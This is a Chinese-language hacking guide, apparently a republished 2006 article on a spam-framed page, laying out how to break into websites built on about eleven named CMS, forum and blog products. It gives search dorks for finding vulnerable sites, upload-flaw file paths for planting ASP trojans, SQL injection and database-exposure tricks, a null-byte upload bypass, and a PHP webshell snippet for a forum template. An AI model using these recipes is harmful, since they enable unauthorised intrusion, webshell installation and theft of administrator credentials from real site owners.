国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

入侵網站:各種漏洞的利用和搜索參數
2006-08-03   賽迪網

一、E時代驛站漏洞

百度搜索"E時代驛站"

漏洞利用頁面 /upload.asp 用老兵直接上傳

二、沸騰新聞系統上傳漏洞

搜索:沸騰展望新聞系統[核心:塵緣雅境]授權使用

漏洞:沒有對空格進行嚴格的限制。

所以,我們直接選定要上傳的asp木馬,然后在后面加上空格

它的上傳文件是UploadFaceOK.asp

三、塵緣雅境

在GOOGLE里搜索關鍵詞: V1.0 ACCESS Finish,就會看

到出現了 一大堆 使用塵緣雅境系統的網站.比如說他的網站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目錄]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不過有些老版的塵緣系統的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改

四、OFSTAR論壇漏洞利用程序(群共享中)

搜索: powered by ofstar.net

1:輸入管理員用戶名

2:輸入任意一個帖子的路徑!

3:單擊獲取密碼,可以截取到管理員的MD5密碼!是32位加密的!

4:單擊直接登陸按鈕!程序會自動構造Cookies進行鍬?單擊管理欄的"超管"可直接進入后臺!

上傳木馬: 選擇后臺的論壇管理=>風格摸版設置 插入以下代碼! (其實上傳shell部分和PHPWind一樣)

然后使用提交頁面提交``可以直接拿到shell!

<style type='text/css'> 

</style> 

<!-- 

EOT; 

?>--> 

<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?> 

<!-- 

<?php 

print <<<EOT 

-->

五、破廢墟BLOG漏洞

百度搜:"破廢墟 Bloging" ,在后面加上upfile.asp,結果返回

DLOG錯誤:提交的數據來自網站外部 | 返 回

或者 您要訪問的網頁有問題,無法顯示。

HTTP 500 - 內部服務器錯誤

這說明這個文件是存在的,但是無法正常的訪問,其實我們也可以利用

直接用老兵上傳木馬http://www.xxxxx.com/blog/upfile.asp

六、動網論壇

1、搜索 Dvbbs Version 7.0.0 Sp2 sql,就會搜索到很多有漏洞 的論壇,選一個,注冊一個用戶,記住用戶名和密碼;

2、打開軟件dvsp2_sql.exe,將要入侵的論壇地址替換掉軟件上的地址。這里新手要注意,論壇地址一般是http://xxx.xxx.xxx/bbs/形式,這時你只需要用 xxx.xxx.xxx替代掉軟件上的www.target.com就可以了,但有的 論壇是http://xxx.xxx.xxx/形式,沒有bbs目錄,你就要用 xxx.xxx.xxx替代掉軟件上的www.target.com/bbs部分。

3、打開軟件包里的md59.exe軟件,在MD5原碼處填入你在論壇注冊的密碼,點擊“16位加密”按鈕,在加密密碼處就得到了加密過的密碼。

4、回到dvsp2_sql.exe 軟件,在“論壇用戶”輸入你注冊的用戶名,“前后臺密碼”處輸入剛轉換的加密密碼。

5、很重要,點擊“注入(S)”按鈕兩次,注意,不多不少,剛好點擊兩次,別亂點擊一通,也不要自己去選擇軟件上的“SQL”和“SP2”,軟件自己會選擇,切記!!!

6、好了,現在用你注冊的用戶名重新登陸論壇,你就是管理員身份了。找到論壇“管理”,用用戶名gxgl.com 密碼你注冊的密碼登陸,你就是壇主了,可以對整個論壇 進行管理。

七、極限論壇系統漏洞

用"EzRick.com All Rights"做關鍵字搜索論壇的置頂帖子存在注入漏洞,大家打開置頂帖子后聯接都是這種形式"showtopic.asp?TOPIC_ID=111&Forum_ID=11"當我們去掉后面的"&Forum_ID=11",注入點就出現了。

然后我們在注入猜解工具的表段名里面添加上"Forum_UserDB"就可以跑出論壇的用戶名和16位md5密碼散列

八、暴庫入侵 OBLOG!

搜索:powered by OBlog ,暴庫示例:http://***/blog/index.asp?classid=3 ,將以上連接中的最后一個正斜杠"/"改為"%5c", http://***/blog%5cindex.asp?classid=3 ,截止powered by OBlog ver2.22之前90%的OBLOG站點都能暴庫

九、阿天在線整站上傳漏洞

百度搜索:阿天在線,漏洞利用很簡單,直接用老兵上傳工具就可以搞頂,漏洞文件是mg_upfile.asp

十、"動感系統"的上傳漏洞

漏洞的文件就是根目錄下的upfile.asp,在百度里搜,inurl: (SoftView.Asp?SoftID=) ,這樣找的是Access版的,inurl: (/SoftView/SoftView_) ,這樣找到的都是SQL版的。

十一、net pic PHP程序的漏洞利用

當PHP程序有指定PATH時,在PATH文件后門加入%00可以上傳任意文件.在百度里搜索"NEATPIC PHP目錄直讀版 1.2.3"你會找到很多裝有些程序的站點

在www.google.com中輸入"版本:Joekoe V6.0"

或者在www.baidu.com中查詢"關于我們 ┋ 網站留言 ┋ 友情鏈接 ┋ 與我在線"

會找到很多joekoe論壇的地址

使用方法:

例如網址為http://www.xxx.com/yyy/forum.asp

在主機名中輸入www.xxx.com

在發送主機路徑中輸入/yyy/upload.asp

點擊發送即可

使用木馬asp

在回應信息中出現上傳成功的提示后,在ie地址欄中輸入

http://www.xxx.com/yyy/upload/forum/newmm.asp即可

在www.baidu.com中輸入"卓越網站快車"

會找到很多相關的地址

使用方法:

例如網址為http://http://www.xxx.cn/htdocs/index.asp

在主機名中輸入www.xxx.com

在發送主機路徑中輸入/htdocs/system/user/upimg1/fileupimg3.asp.如果沒有/htdocs的虛擬目錄,則不用改變默認值.

點擊發送即可

使用木馬asp

在回應信息中出現上傳成功的提示后,在"上傳的asp文件名中"的編輯框中會出現上傳成功的asp名稱.例如http://www.xxx.cn/htdocs/FICE/UP/20041122234053.cdx.asp

熱詞搜索:

上一篇:應對企業內網安全挑戰十大策略
下一篇:應用記錄對于檢測黑客攻擊非常重要

分享到: 收藏
主站蜘蛛池模板: 朔州市| 钟山县| 东阿县| 砚山县| 尚义县| 保山市| 海原县| 夏津县| 观塘区| 常熟市| 沁源县| 成武县| 千阳县| 洛隆县| 陆良县| 会同县| 襄城县| 涿州市| 井陉县| 通山县| 樟树市| 璧山县| 塘沽区| 吴川市| 横山县| 沁水县| 达孜县| 桃园市| 宜城市| 驻马店市| 墨脱县| 含山县| 元谋县| 铁岭市| 吴堡县| 米林县| 繁峙县| 伊金霍洛旗| 兰西县| 交口县| 仙游县|